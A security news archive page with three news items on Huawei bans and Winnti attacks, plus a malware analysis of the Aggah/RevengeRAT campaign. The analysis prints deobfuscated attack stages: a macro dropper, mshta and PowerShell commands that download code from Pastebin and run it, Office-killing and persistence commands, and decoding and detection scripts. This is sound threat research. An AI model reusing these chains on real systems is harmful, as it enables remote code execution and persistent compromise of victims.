Category Archives: Cyberespionage

Romania is going to exclude Huawei from its 5G Network

Romania will ban Chinese giant Huawei from its 5G network, reads a joint statement signed by the Romanian and US presidents.

Romania is the latest country to move to ban Chinese giant Huawei from its 5G network, according to a joint statement signed by the Romanian and US presidents.

The document was signed by Romania’s Klaus Iohannis and President Donald Trump during the visit of the Romanian President to Washington.

The two states “seek to avoid the security risks that accompany Chinese investment in 5G telecommunications networks”.

Iohannis is worried about Huawei’s possible participation in the building of the country’s 5G network; he added that the Supreme Council of National Defence (CSAT) would discuss it.

“The Romanian and American delegations also signed a memorandum of understanding on Tuesday establishing the conditions that service providers will have to fulfil to be part of the network.” reads the AFP press.

“These include the obligation not to be under the control of a third country’s government, according to Romanian news website G4Media.”

The Romanian Government adopted the “5G strategy for Romania” in June; the rollout is expected to create 250,000 jobs and bring in 4.7 billion euros ($5.2 billion).

The Romanian Government is going to launch a call for tenders for the country’s 5G network in the fourth quarter of this year.

Initially, the government had no intention of banning Huawei, but it evidently decided to accept President Trump’s request to US allies to exclude the Chinese manufacturer from their infrastructure.

In April, the British Government approved a limited role for Huawei in the building of the country’s national 5G network, ignoring security concerns raised by senior ministers. In December, the Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese giant has already been excluded by several countries from building their 5G networks: the United States, Australia, New Zealand, and Japan announced the exclusion of Huawei technology from their 5G networks.

Pierluigi Paganini

(SecurityAffairs – Huawei, cyberespionage)


The post Romania is going to exclude Huawei from its 5G Network appeared first on Security Affairs.

The Evolution of Aggah: From Roma225 to the RG Campaign

The experts at Yoroi-Cybaze ZLab discovered a new wave of attacks linked to the cyber espionage campaign tracked as Roma225.


A few months ago we started observing a cyber operation aiming at private companies in various business sectors, from automotive to luxury, education, and media/marketing. The attribution of the attacks is still unclear, but the large scale of the malicious activity has also been confirmed by Unit42, which reported attack attempts against government verticals too.

The attacks are characterized by the use of a Remote Access Trojan named “RevengeRAT”, suggesting a possible, still unconfirmed and under investigation, connection with the Gorgon Group, a known mercenary APT group that has run cyber-espionage operations and has been involved in criminal activities too.

A few weeks ago, Unit42 discovered another active campaign, compatible with the Roma225 one we tracked in December 2018, pointing to some interesting changes in the attackers’ TTPs. Recently, we intercepted other attacks potentially related to this wider criminal operation. For this reason, the Cybaze-Yoroi ZLab team decided to analyze this recent campaign in order to investigate the evolution of the Aggah threat.

Technical Analysis

The whole infection chain shows an interesting degree of sophistication, leveraging about seventeen stages: a non-negligible number of steps put in place to decouple the infection vector from the actual payload. The following infographic summarizes the infection chain dissected in the sections below, starting from the weaponized Office document, initially delivered through malicious emails, to the final RevengeRAT payload.


The Macro Dropper

Brief Description: XLS macro dropper
Ssdeep: 768:kCSk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJ7evT8RsFbQ:kDk3hOdsylKlgxopeiBNhZFGzE+cL2kt

Table 1: Information about the RevengeRAT malicious macro dropper

The whole infection starts with a malicious XLS document weaponized with an embedded macro. The VBA code is polluted by a multitude of junk instructions; after a cleaning phase we isolated the essence of the malicious code.

  Public Function Workbook_Open()
      ' Each chunk is a string obfuscated by adding a constant to every character
      ' code; YUcIFcEAA subtracts it back (7, 7 and 5 respectively)
      rgh1 = YUcIFcEAA("tzo{h'o{{wA66ip", "7")
      rgh2 = YUcIFcEAA("{5s€6", "7")
      rgh3 = YUcIFcEAA("7O^7ixXmxmxm", "5")
      rgh = rgh1 + rgh2 + rgh3
      ' The decoded string is an "mshta <shortened URL>" command line
      Shell rgh
  End Function
  Public Function YUcIFcEAA(Sg1NdPNeR As String, jxvMDn0vV As Integer)
      Dim PFc88so50 As Integer
      ' In-place character shift: Chr(Asc(c) - key) for every position
      For PFc88so50 = 1 To Len(Sg1NdPNeR)
          Mid(Sg1NdPNeR, PFc88so50, 1) = Chr(Asc(Mid(Sg1NdPNeR, PFc88so50, 1)) - jxvMDn0vV)
      Next PFc88so50
      YUcIFcEAA = Sg1NdPNeR
  End Function

Code Snippet 1:  real core of the macro

Figure 2: Command used to start the infection

A quick and dirty manipulation of the script let us bypass the obfuscation protecting the next stage of the infection: the invocation of a Microsoft HTML Application hosted at a remote location.

The macro’s only purpose is to run the mshta command. As MITRE ATT&CK puts it, “Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.”
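As an added example (not code from the Yoroi/Cybaze analysis), the following Python reimplements the macro’s YUcIFcEAA shift decoder so the argument of Shell can be recovered from the three encoded chunks of Code Snippet 1 without opening the document in Office. It assumes, as VBA’s Asc/Chr semantics imply, that the strings are handled as Windows-1252 bytes (so the “€” in the second chunk is byte 0x80), and it adds a brute-force helper for samples where the shift constant is not known.

```python
import string

# Added example: reimplementation of the macro's character-shift decoder.
# Assumption: VBA's Asc()/Chr() work on the ANSI (Windows-1252) code page,
# so the '€' in the second chunk is byte 0x80 and decodes to 'y'.
CODEPAGE = "cp1252"


def vba_shift_decode(encoded: str, shift: int) -> str:
    """Mirror of YUcIFcEAA(): subtract `shift` from every character code."""
    data = encoded.encode(CODEPAGE)
    return bytes((b - shift) & 0xFF for b in data).decode(CODEPAGE, errors="replace")


# The three encoded chunks and shifts from Code Snippet 1. The page renders the
# apostrophe in the first chunk as a curly quote; the macro uses the plain 0x27
# apostrophe, which decodes to the space between "mshta" and the URL.
CHUNKS = [("tzo{h'o{{wA66ip", 7), ("{5s€6", 7), ("7O^7ixXmxmxm", 5)]


def recover_shell_command(chunks=CHUNKS) -> str:
    """Rebuild the string passed to `Shell rgh` by decoding and concatenating."""
    return "".join(vba_shift_decode(s, k) for s, k in chunks)


def brute_force_shift(encoded: str, max_shift: int = 32) -> dict:
    """For a chunk whose shift is unknown, return every shift value that yields
    printable ASCII; the analyst then picks the candidate that reads as a command."""
    printable = set(string.printable) - set("\t\n\r\x0b\x0c")
    candidates = {}
    for k in range(1, max_shift + 1):
        decoded = vba_shift_decode(encoded, k)
        if decoded and all(c in printable for c in decoded):
            candidates[k] = decoded
    return candidates


if __name__ == "__main__":
    print(recover_shell_command())
    for k, text in brute_force_shift("{5s€6").items():
        print(f"shift {k:2d}: {text}")
```

Running it prints the mshta command line with the bit.ly link the macro launches; the brute-force output for the second chunk shows why a printable-ASCII filter is only a first cut (several shifts produce printable junk), so the decision still needs an analyst reading the candidates.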

The Hidden HTA

The malware retrieves the HTA application to run from a remote host hidden behind the Bitly shortening service. The target page is “rg.html”, downloaded from hxxps://createdbymewithdeniss[.]blogspot[.]com/p/rg[.]html. Even in this case, as in the Roma225 campaign, the attacker abused the Blogger platform to hide the malicious code in plain sight.

Figure 3: Fake Blogspot page

The page does not embed any binaries or malicious links, but browsing its source code reveals packed HTML code dynamically injected into the page during rendering.

Figure 4: Malicious code contained in the malicious “blogspot” site

This additional piece of script is specifically designed to be executed by the “mshta” utility. It is VBScript code creating a “WScript.Shell” object, something a regular web browser engine would never expose to a page.

  <script language="VBScript">
  Set Xkasdj2 = CreateObject(StrReverse(StrReverse("WScript.Shell")))
  ' Xa_aw1 is built one character at a time and decodes to "http://www.pastebin.com/raw/"
  Xa_aw1 = StrReverse(StrReverse("h")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(StrReverse("p")) + StrReverse(":") + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(".")) + StrReverse(StrReverse("p")) + StrReverse(StrReverse("a")) + StrReverse(StrReverse("s")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse("e") + StrReverse("b") + StrReverse("i") + StrReverse("n") + StrReverse(StrReverse(".")) + StrReverse("c") + StrReverse("o") + StrReverse(StrReverse("m")) + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse("r") + StrReverse(StrReverse("a")) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("/"))))
  ' Xa_aw0 decodes to "mshta "
  Xa_aw0 = StrReverse(StrReverse("m")) + StrReverse(StrReverse("s")) + StrReverse(StrReverse("h")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(" a")
  Xa_aw2 = "efZDG7aL"
  XXX = Xa_aw0 + Xa_aw1 + Xa_aw2
  Morg = XXX
  Xa_aw = Morg
  Xkasdj2.Run Xa_aw, vbHide
  self.close
  </script>

Code Snippet 2: VBScript code after the “unescape” function

The VBScript code is obfuscated with a series of “StrReverse” calls, but the action it performs is still clearly evident: spawn another mshta process to execute a new HTA application hosted on Pastebin (hxxp://pastebin[.]com/raw/efZDG7aL).

Figure 5: Malicious code stored on pastebin

This other script is encoded in hexadecimal as well. After decoding, its content can be divided into four parts. The first one is responsible for killing some Microsoft Office suite processes: Word, Excel, Publisher and PowerPoint.

  cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE

Code Snippet 3: First deobfuscated piece of code

The second chunk, instead, hides the next malware stage invocation within a PowerShell script.

  powershell.exe $LOLO=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,67,77,50,50,118,84,117,112,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,81,120,48,75,50,98,97,78,39,41,46,114,101,112,108,97,99,101,40,39,94,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,77,83,66,117,105,108,100,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($LOLO)|IEX

Code Snippet 4: Second deobfuscated piece of code

This code snippet hides a PowerShell stage encoded as an array of decimal character codes. The corresponding ASCII text is rebuilt with [System.Text.Encoding]::ASCII.GetString and then executed through the IEX cmdlet.

  [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxps://pastebin[.]com/raw/CM22vTup')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxps://pastebin[.]com/raw/Qx0K2baN').replace('^','0x')|IEX;[k.Hackitup]::exe('MSBuild.exe',$f)

Code Snippet 5: Deobfuscated powershell function

This code builds up the core of the malware implant (discussed in the next section). The third chunk of the code, instead, is where the attacker sets up two different persistence mechanisms. Each of them invokes a different HTA application retrieved from Pastebin:

  • The first persistence method is the classic “Run” registry key.
  Set Xm_w = CreateObject("WScript.Shell")
  L_Xe = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate"
  Xm_w.RegWrite L_Xe, "mshta.exe http://pastebin[.]com/raw/bMJxXtXa", "REG_EXPAND_SZ"

Code Snippet 6: Third deobfuscated piece of code (part 1)

  • The second persistence method abuses scheduled tasks.
  Set Mi_G = CreateObject(StrReverse(StrReverse("WScript.Shell")))
  Dim We_wW
  ' Reversed string: "schtasks /create /sc MINUTE /mo 30 /t"
  We_wW0 = StrReverse("t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs")
  We_wW1 = "n ""Windows Update"" /tr ""mshta.ex"
  ' Assembled one character at a time: e http://pastebin[.]com/raw/tuGAsMze" /F
  We_wW2 = "e h" + "t" + "t" + "p" + ":" + "/" + "/" + "p" + "a" + "s" + "t" + "e" + "b" + "i" + "n" + "." + "c" + "o" + "m" + "/" + "r" + "a" + "w" + "/tuGAsMze"" /F "
  We_wW = We_wW0 + We_wW1 + We_wW2
  Mi_G.Run We_wW, vbHide

Code Snippet 7:  Third deobfuscated piece of code (part 2)

Both scripts are stored on the Pastebin platform, and even though the first one has been removed, the malware keeps its persistence thanks to the second method.

The last chunk of code, the fourth, contains a large number of registry keys ready to be set on the target machine. This behavior has been implemented to drastically reduce the defenses of the target host, for instance by disabling security features of Microsoft Windows and the Office ecosystem. The “Edited Registry Keys” section lists them.
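Every stage described above leaves the same small set of telemetry behind: an Office process spawning mshta.exe, mshta.exe launched with a URL on its command line, taskkill aimed at Office, a schtasks /create whose /tr points at mshta, and a Run key whose value starts with mshta.exe. The following Python, added here as an example and not part of the original analysis, runs those checks over a handful of constructed Sysmon-style process-creation and registry events (the field names and the sample records are assumptions made for the example, not captured telemetry) and reports which rule each event trips.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style events modelled on the chain above (sample records
# written for this example, not real telemetry). Field names are an assumption.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://bit.ly/2JY2dsShshsh"},
    {"type": "process", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://www.pastebin.com/raw/efZDG7aL"},
    {"type": "process", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe"},
    {"type": "process", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc MINUTE /mo 30 /tn "Windows Update" '
                '/tr "mshta.exe http://pastebin.com/raw/tuGAsMze" /F'},
    {"type": "registry", "image": r"C:\Windows\System32\mshta.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate",
     "value": "mshta.exe http://pastebin.com/raw/bMJxXtXa"},
    # Benign noise: a normal scheduled task and an ordinary Office child process.
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc DAILY /tn "Backup" /tr "C:\\Tools\\backup.exe"'},
    {"type": "process", "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe 12288"},
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe", "outlook.exe")
SCRIPT_HOSTS = ("mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
PASTE_HOSTS = ("pastebin.com", "blogspot.com", "bit.ly")
URL_RE = re.compile(r"https?://\S+", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict) -> List[str]:
    """Return the names of every rule the event trips (empty list if none)."""
    hits: List[str] = []
    if ev["type"] == "registry":
        # Run-key persistence whose value launches mshta (Code Snippet 6).
        if r"\currentversion\run" in ev["key"].lower() and "mshta" in ev["value"].lower():
            hits.append("run_key_mshta")
        return hits
    image = basename(ev["image"])
    parent = basename(ev.get("parent", ""))
    cmd = ev["cmdline"]
    low = cmd.lower()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:       # macro -> Shell
        hits.append("office_spawns_script_host")
    if image == "mshta.exe" and URL_RE.search(cmd):            # remote HTA
        hits.append("mshta_remote_content")
    if image == "schtasks.exe" and "/create" in low and "mshta" in low:
        hits.append("schtasks_mshta_persistence")              # Code Snippet 7
    if "taskkill" in low and any(app in low for app in OFFICE_APPS):
        hits.append("taskkill_office")                         # Code Snippet 3
    if image in ("mshta.exe", "powershell.exe") and any(h in low for h in PASTE_HOSTS):
        hits.append("paste_site_fetch")
    return hits


def detect(events) -> Dict[int, List[str]]:
    """Map event index -> rule names for every event that tripped a rule."""
    findings: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, rules in detect(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

The two benign records are there on purpose: a legitimate schtasks /create and an Office child that is not a script host must stay silent, otherwise the schtasks and Office-parent rules would page on every workstation. The paste-site rule is a supporting signal rather than a verdict on its own.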

The Hagga Pastes

As stated in the previous section, Code Snippet 5 contains the core of the malicious actions. The malware downloads and executes PowerShell code from two pastes, one after the other. The first one is “CM22vTup” and has been published by a Pastebin user named “HAGGA”, the same user reported in the Palo Alto Networks analysis.

Figure 6: New payload downloaded from Pastebin

As previously hinted, the PowerShell code in the “CM22vTup” snippet encodes its payload in numeric format. Decoding “PAYLOAD_1”, another obfuscated PowerShell script, reveals the in-memory loading of a binary payload directly into the running process.

  $jk=@(PAYLOAD_1);$p=[System.Text.Encoding]::ASCII.GetString($jk)|IEX

Code Snippet 8: Code structure of the downloaded script

  [Byte[]]$sc64=iex('PAYLOAD_2'.replace('%_','0x'));$a = [Microsoft.VisualBasic.Interaction]::CallByname([AppDomain]::CurrentDomain,'Load',[Microsoft.VisualBasic.CallType]::Method,$sc64)

Code Snippet 9: Structure of the script contained in “PAYLOAD_1”

After a basic manipulation, the data hidden in “PAYLOAD_2” turns out to be the hexadecimal representation of a PE file, easily recognizable by the characteristic “4D 5A” (MZ) header.

  %_4D,%_5A,%_90,%_00,%_03,%_00,%_00,%_00,%_04,%_00,%_00,%_00,%_FF,%_FF,%_00,%_00,%_B8,%_00,%_00,%_00,%_00,%_00, [.....]

Code Snippet 10: “PAYLOAD_2” in hex encoding
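The two encodings used from Code Snippet 4 onward are easy to undo offline: the decimal array is just ASCII character codes, and the “%_”/“^”-prefixed form is hex bytes with the prefix swapped for “0x” before the string is evaluated. The following Python, an added example rather than code from the original analysis, implements both decoders generically (any prefix token, not only the two seen on this page), pulls the Pastebin paste IDs out of a decoded stage, and checks a decoded blob for the MZ and PE headers without ever running it. The decimal sample is the opening portion of the array in Code Snippet 4 and the hex sample is the excerpt in Code Snippet 10, so both are page data cut short rather than complete payloads; the Snippet 5 text is embedded with defanged URLs.

```python
import re
import struct
from typing import List, Optional

# Opening portion of the decimal array from Code Snippet 4 (truncated on purpose).
DECIMAL_SAMPLE = (
    "$LOLO=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,"
    "101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,"
    "100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,"
    "114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59);"
    "[System.Text.Encoding]::ASCII.GetString($LOLO)|IEX"
)
# Excerpt of PAYLOAD_2 from Code Snippet 10 (first 22 bytes of the DOS header).
HEX_SAMPLE = ("%_4D,%_5A,%_90,%_00,%_03,%_00,%_00,%_00,%_04,%_00,%_00,%_00,"
              "%_FF,%_FF,%_00,%_00,%_B8,%_00,%_00,%_00,%_00,%_00")
# Decoded stage from Code Snippet 5, with the URLs defanged.
SNIPPET5_SAMPLE = (
    "[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');"
    "$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),"
    "'DownloadString',[Microsoft.VisualBasic.CallType]::Method,"
    "'hxxps://pastebin[.]com/raw/CM22vTup')|IEX;"
    "[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),"
    "'DownloadString',[Microsoft.VisualBasic.CallType]::Method,"
    "'hxxps://pastebin[.]com/raw/Qx0K2baN').replace('^','0x')|IEX;"
    "[k.Hackitup]::exe('MSBuild.exe',$f)"
)

DECIMAL_ARRAY_RE = re.compile(r"@\(\s*([\d,\s]+?)\s*\)")
PASTE_RE = re.compile(r"pastebin\[?\.\]?com/raw/([A-Za-z0-9]+)")


def decode_decimal_array(stage: str) -> str:
    """Turn the first @(n,n,n,...) array in a PowerShell stage into ASCII text."""
    m = DECIMAL_ARRAY_RE.search(stage)
    if not m:
        raise ValueError("no decimal array found")
    return bytes(int(n.strip()) for n in m.group(1).split(",")).decode("ascii")


def decode_prefixed_hex(blob: str, prefix: str) -> bytes:
    """Undo the "'%_' -> '0x'" (or "'^' -> '0x'") trick statically: every
    occurrence of `prefix` followed by two hex digits becomes one byte."""
    pat = re.compile(re.escape(prefix) + r"([0-9A-Fa-f]{2})")
    return bytes(int(h, 16) for h in pat.findall(blob))


def has_mz_header(data: bytes) -> bool:
    return data[:2] == b"MZ"


def pe_signature_offset(data: bytes) -> Optional[int]:
    """Return e_lfanew when the blob carries a full DOS header and the
    'PE\\0\\0' signature is found there; None for truncated or non-PE data."""
    if len(data) < 0x40 or not has_mz_header(data):
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
        return e_lfanew
    return None


def extract_paste_ids(stage: str) -> List[str]:
    """Pull the raw-paste IDs (the next stages) out of a decoded script,
    whether the host is written live or defanged as pastebin[.]com."""
    seen: List[str] = []
    for pid in PASTE_RE.findall(stage):
        if pid not in seen:
            seen.append(pid)
    return seen


if __name__ == "__main__":
    print(decode_decimal_array(DECIMAL_SAMPLE))
    print("next stages:", extract_paste_ids(SNIPPET5_SAMPLE))
    pe = decode_prefixed_hex(HEX_SAMPLE, "%_")
    print("MZ header:", has_mz_header(pe), "PE signature offset:", pe_signature_offset(pe))
```

Doing the substitution statically, instead of the `.replace(...)|IEX` the sample uses, matters: the malware's own one-liner evaluates whatever it decodes, while the decoders above only produce bytes that can then be carved, hashed and fed to a disassembler. On the 22-byte excerpt the PE signature check correctly returns None, since e_lfanew lies beyond the truncated header.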

This PE32 file is a well-formed .NET assembly. The following table shows its static information.

Threat: RevengeRAT / Injector
Brief Description: RevengeRAT / injector payload, obfuscated
Ssdeep: 768:zQosoqOovPJmzW0GzJrMfogNeEbSBUrOaqVJswUna4OI9O:zQyoUzW0GrQ6UiaqVJ1Ua4Vs

Table 2: Information about the RevengeRAT / Injector malicious payload

Figure 7: Static information about payload described in table 2  

However, the .NET payload is not totally unprotected: it has been obfuscated with the “ConfuserEx” obfuscator.

The assembly is a Dynamic-Link Library with only one purpose: injecting the payload into a target process through the well-known “Process Hollowing” technique. At this stage of the infection chain the final payload, the RevengeRAT remote administration tool, can be retrieved.

Figure 8: Process Hollowing references inside the PE file

The RevengeRAT Payload

Figure 9: RevengeRAT payload in hex encoding

The final payload is the one downloaded from the Pastebin page “Qx0K2baN”, as reported in Code Snippet 5. It comes with the same obfuscation method seen in PAYLOAD_2: hex encoding together with a simple replacement routine.

Brief Description: RevengeRAT payload, obfuscated
Ssdeep: 768:3Yo9AzKlOOYIl+tqRsoYGvoJGPdyOYOCbf9eThI21Os+JZiIPxTS0X4Dwrw2T9:5AmlEIl+tqSoY2oyfYOweT6s+JlPVnz

Table 4: Information about the RevengeRAT malicious payload

This executable, too, is a well-formed .NET assembly, but in this case it is obfuscated with another tool, “.NET Reactor”, a commercial code protection product for .NET applications.

Figure 10: Evidence about .NET Reactor obfuscator

Exploring the code, we found many similarities with the RevengeRAT samples previously analyzed by us and by Unit 42. This means, with reasonable confidence, that the campaign we are dissecting is an evolution of the previous ones, showing increased malware stealthiness and the adoption of new techniques, such as process hollowing, in the infection chain. Despite that, the RevengeRAT core is substantially the same.

Figure 11: Comparison among RevengeRAT belonging to different campaigns

This time the recurring word is “rg”. In fact, the two payloads downloaded from the Pastebin platform are named “rgrunpe” and “rgbin”; the new command and control server domains also start with the two letters “rg”, the codename of this latest campaign. Unlike the “roma225” case, the socket key of the RAT is configured with the static string “lunlayo”, and the ID is “HOTEIS NOVOS” instead of “POWERScreenPOWER”.

Anyway, as shown in Figure 11, the ID and Mutex of the last two campaigns are the same, indicating that the group is active and the infection campaign continues. Moreover, considering the number of views counted by the Pastebin snippet “CM22vTup”, the one delivering the RevengeRAT payload, it is possible to estimate the magnitude of the attack, which may involve up to 1,600 victims.

Figure 12: Hagga campaign reference


Since December 2018 we have been following the tracks of this ambiguous cyber criminal group, internally referenced as TH-173. There are chances this whole activity could be linked with the Gorgon Group, but at the moment we have no definitive evidence of this connection.

Anyway, by keeping a constant eye on this threat, we observed a refinement of their infection chain while they kept some of their TTPs intact, such as the abuse of the Blogspot platform and of legitimate dynamic DNS services. In fact, the group started abusing Pastebin to add complexity to the infection chain, mixing hidden MSHTA code, PowerShell scripts and additional process injection techniques into their arsenal.

Technical details, including Indicators of Compromise and Yara rules, are reported in the full analysis on the Yoroi blog.

Pierluigi Paganini

(Security Affairs – Roma225, hacking)


German firms BASF, Siemens, Henkel hit by cyber attacks

A new wave of cyber attacks carried out by a China-linked APT group hit German blue-chip companies BASF, Siemens, Henkel and others.

On Wednesday, German blue-chip companies BASF, Siemens and Henkel, along with a host of others, confirmed they had been targeted by a wave of cyber attacks. German media reported that the attacks were launched by a China-linked cyberespionage group.

According to the German broadcaster ARD, the systems at the companies were infected with the Winnti backdoor.

Experts believe that several APT groups operate under the Winnti umbrella, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda, and ShadowPad. The groups show similar tactics, techniques, and procedures (TTPs) and in some cases shared portions of the same hacking infrastructure.


Recently, Chronicle researchers investigating the cyber attack that hit the pharmaceutical company Bayer in April spotted a Linux variant of the Winnti backdoor.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The gang is financially motivated but was mostly involved in cyber espionage campaigns. The hackers were known for targeting companies in the online gaming industry; the majority of the victims are located in Southeast Asia.

According to the Reuters agency, the hackers also targeted other firms, including Roche and airline Lion Air.

“Alongside the German firms named, companies including drug maker Roche, hotels group Marriott, airline Lion Air, conglomerate Sumitomo, and chemicals group Shin-Etsu were also targeted by the hackers, ARD reported.” reported the Reuters agency.

Siemens, Henkel and Roche blamed the “Winnti” malware for the infections, while BASF and Covestro only confirmed that they had been victims of cyber attacks.

“All said that no sensitive information was lost, while none of the companies commented on whether the attacks had been launched by Chinese hackers.” Reuters continues.

Other victims of the attacks, including Shin-Etsu, Sumitomo, Lion Air, Marriott and Valve, have yet to comment on the attacks.

In April, Bayer announced that it had been the victim of cyber attacks launched by a China-linked APT group; the activity of this specific threat actor against Bayer was first spotted in early 2018 and, according to the experts, the hackers remained inside the company networks until late in the previous month.

In 2016, the same hackers also hit German heavy industry giant ThyssenKrupp to steal company secrets, according to media reports at the time.

The hackers launched a “massive cyber attack” against the divisions dealing with orders planning of industrial plants, the conglomerate’s Industrial Solutions, and Steel Europe business divisions.

Pierluigi Paganini

(SecurityAffairs – China-linked APT, Winnti)


Czech public radio says Huawei Czech Unit secretly collected data

New problems for Huawei: the Czech unit of the telecoms giant secretly collected personal data of customers, officials and business partners.

Huawei made the headlines again: according to Czech public radio, the Czech unit of the Chinese telecoms giant secretly collected personal data of customers, officials, and business partners.

The radio cited two former Huawei managers as the source; the duo, speaking on condition of anonymity, revealed that Huawei required them to enter the data into computer systems that could be accessed from China.

“Managers who worked for the company for many years told our reporters that they had been forced to enter people’s personal data into a system that was separate from commercial data,” states the report.

The managers explained that the information collected by the company included the number of children, financial situation, and hobbies of persons of interest. 

“Access to this information in the Customer Relationship Management (CRM) system is only managed by Huawei headquarters in China,” revealed one of the managers.

According to the AFP press agency, the Czech unit declared that it was in compliance with the EU’s General Data Protection Regulation (GDPR).

In December 2018, the Czech National Cyber and Information Security Agency warned against using the equipment manufactured by Chinese firms Huawei and ZTE because they pose a threat to state security.

“The main issue is a legal and political environment of the People’s Republic of China, where (the) aforementioned companies primarily operate,” reads a statement issued by the Czech National Cyber and Information Security Agency.

“China’s laws, among other things, require private companies residing in China to cooperate with intelligence services, therefore introducing them into the key state systems might present a threat,” 

According to the Czech News Agency (CTK), the Czech branch of the Chinese telco giant Huawei rejected the accusations and asked the agency to provide proof of the alleged espionage activities on behalf of Chinese intelligence.

“The warning comes on the heels of a Czech intelligence report which warned about increased spying activities of Chinese diplomats in the EU and NATO member state of 10.6 million people.” reported the AFP press.

The US first, followed by many other countries, decided to ban network equipment manufactured by the Chinese telecom giant Huawei.

In November 2018, the Wall Street Journal reported that the US Government was urging its allies, including Germany, to exclude Huawei from critical infrastructure and 5G architectures.

